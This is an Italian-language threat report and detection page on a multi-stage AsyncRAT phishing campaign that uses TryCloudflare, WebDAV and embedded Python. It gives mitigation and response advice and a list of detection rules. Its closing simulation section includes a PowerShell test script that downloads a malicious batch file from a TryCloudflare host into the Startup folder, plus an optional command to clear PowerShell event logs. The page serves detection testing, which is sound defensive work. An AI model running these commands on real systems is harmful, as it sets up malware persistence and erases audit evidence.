Come l’MDR ha scoperto una catena di attacchi multi-stage AsyncRAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Il rapporto descrive una catena di intrusione a più fasi avviata tramite email di phishing che consegnano esche ZIP a doppia estensione e si trasformano in una sequenza di payload ospitati su WebDAV. Gli operatori abusano delle infrastrutture gratuite di Cloudflare e dei componenti Python incorporati per distribuire AsyncRAT sui terminali delle vittime. L’esecuzione e la persistenza si basano sugli strumenti nativi di Windows—Windows Script Host, PowerShell e script batch—mentre la fase finale utilizza l’iniezione di codice in explorer.exe. Reindirizzando la consegna e lo staging tramite servizi cloud ampiamente fidati, l’attività si integra nel traffico normale e può eludere i controlli convenzionali del perimetro.
Indagine
Gli investigatori di Trend Micro hanno riportato telemetria coerente con un flusso di consegna a fasi: recupero di un archivio .pdf.zip da Dropbox, esecuzione di collegamenti .url incorporati e successiva interazione WebDAV attribuita a svchost.exe e rundll32.exe. La catena ha quindi distribuito file incorporati di Python 3.14.0, che sono stati usati per eseguire uno script Python personalizzato responsabile dell’iniezione APC del shellcode di AsyncRAT. La persistenza è stata ottenuta posizionando file batch nella directory di avvio dell’utente. Gli analisti hanno anche identificato e correlato più host TryCloudflare a supporto dell’infrastruttura.
Mitigazione
Riduci l’esposizione formando gli utenti a trattare archivi a doppia estensione e allegati ZIP inaspettati come sospetti e stringendo il filtraggio per i link cloud consegnati via phishing. Blocca o controlla strettamente l’accesso ai servizi di tunneling cloud non autorizzati e monitora un affidamento anormale su WebDAV in ambienti dove è raro. Restringi l’esecuzione di script da directory scrivibili dall’utente e rinforza i controlli sull’uso delle cartelle Startup e sulla creazione di attività pianificate. Dai priorità alle rilevazioni EDR/comportamentali che possono portare alla luce catene di esecuzione guidate da script e tecniche di iniezione del codice che prendono di mira processi benigni.
Risposta
Se viene rilevata un’attività, isola il terminale e interrompi i processi sospetti associati alla catena (in particolare svchost.exe, rundll32.exe e python.exe legati all’incidente). Elimina la persistenza eliminando gli artefatti batch dannosi dalla directory di startup, eradicando gli archivi Python scaricati e qualsiasi componente AsyncRAT, e esegui una scansione forense completa per file di staging e movimenti laterali aggiuntivi. Aggiorna i controlli di rete e le liste di blocco per includere i domini TryCloudflare identificati e qualsiasi infrastruttura associata osservata durante il triage.
Flusso di Attacco
Rilevamenti
Download o Upload tramite Powershell (via cmdline)
Visualizza
LOLBAS WScript / CScript (via process_creation)
Visualizza
File Python Creato In Una Directory Insolita (via file_event)
Visualizza
Comunicazione Sospetta con Dominio Trycloudflare (via proxy)
Visualizza
È stata Eseguita un’Operazione Manuale o di Scriptazione in Cartelle Insolite (via cmdline)
Visualizza
Comunicazione Sospetta con Dominio Trycloudflare (via dns)
Visualizza
IOCs (DestinationIP) per rilevare: Analisi di una Campagna Multi-Stadio di AsyncRAT tramite Rilevamento e Risposta Gestiti
Visualizza
IOCs (SourceIP) per rilevare: Analisi di una Campagna Multi-Stadio di AsyncRAT tramite Rilevamento e Risposta Gestiti
Visualizza
Comando PowerShell per Scaricare File Python e Batch per Configurazione e Persistenza dell’Ambiente [Windows Powershell]
Visualizza
Campagna di Phishing che Utilizza Edge e Cmd per Eseguire Script Python per Iniezione di Codice [Windows Process Creation]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Preliminare di Telemetria e Baseline deve essere andato a buon fine.
-
Narrativa di Attacco & Comandi
Un avversario che ha ottenuto accesso iniziale a PowerShell su un host Windows compromesso desidera impostare un ambiente di esecuzione Python e ottenere la persistenza. Lo:
- Scarica la distribuzione incorporata di Python direttamente nella
Temp localedell’utente usandoInvoke‑WebRequest. - Scarica un batch script malevolo (
ahke.bat) da un dominio proxy di Cloudflare alla cartella di avvio dell’utente in modo che si esegua ad ogni accesso. - Esegui lo zip di Python scaricato (omesso qui per brevità) per eseguire ulteriori payload.
Questi passaggi producono esattamente le stringhe di comando corrispondenti alla regola Sigma, generando log di blocchi script PowerShell con il
iwr … -OutFile …pattern. - Scarica la distribuzione incorporata di Python direttamente nella
-
Script di Test di Regressione
# ------------------------------------------------- # Simulazione PowerShell dell'impostazione dell'ambiente AsyncRAT # ------------------------------------------------- # 1. Scarica l'embed zip di Python nella cartella temp utente $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip' $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip" iwr $pythonUrl -OutFile $pythonDest # 2. Scarica file batch malevolo su Startup per la persistenza $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat' $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" iwr $batUrl -OutFile $batDest # 3. (Opzionale) Attiva esecuzione del batch per dimostrare la persistenza # Start-Process -FilePath $batDest -WindowStyle Hidden # ------------------------------------------------- -
Comandi di Pulizia
# Rimuovi gli artefatti scaricati Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue # Facoltativamente cancella i log dei blocchi script PowerShell (richiede admin) # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"